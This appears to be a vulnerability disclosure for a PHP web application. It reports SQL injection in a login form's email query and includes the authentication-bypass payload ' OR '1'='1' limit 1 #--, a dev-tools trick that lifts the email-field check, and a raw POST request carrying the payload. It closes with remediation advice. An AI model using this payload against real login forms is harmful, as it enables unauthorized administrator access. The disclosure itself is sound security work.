Hola 👋🏾
While reviewing the source codes I had identified that there is a vulnerability on the login form starting from line 48:
$result= $database->query("select * from webuser where email='$email'");An attacker in this case is able to use the payload ' OR '1'='1' limit 1 #-- on the email field by first opening dev tools and changing the type of field from email to text removing the limitations of inserting a legit email address, which should allow him to fully bypass the authentication and gain access as the administrator.
Proof of Concept
Find below the POC:
I first change the type of the input tag and then I insert the payload:
It'll then redirect to /admin/
Additionally, I have also provided the raw request for your reference:
POST /login.php?action=logout HTTP/1.1
Host: localhost:8083
Content-Length: 66
Origin: http://localhost:8083
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Connection: keep-alive
useremail=%27+OR+%271%27%3D%271%27+limit+1+%23--&userpassword=test
Remediation
- Use prepared statements
- Don’t concatenate SQL with user input
Hola 👋🏾
While reviewing the source codes I had identified that there is a vulnerability on the login form starting from line 48:
An attacker in this case is able to use the payload
' OR '1'='1' limit 1 #--on the email field by first opening dev tools and changing the type of field fromemailtotextremoving the limitations of inserting a legit email address, which should allow him to fully bypass the authentication and gain access as the administrator.Proof of Concept
Find below the POC:
I first change the type of the input tag and then I insert the payload:
It'll then redirect to /admin/
Additionally, I have also provided the raw request for your reference:
Remediation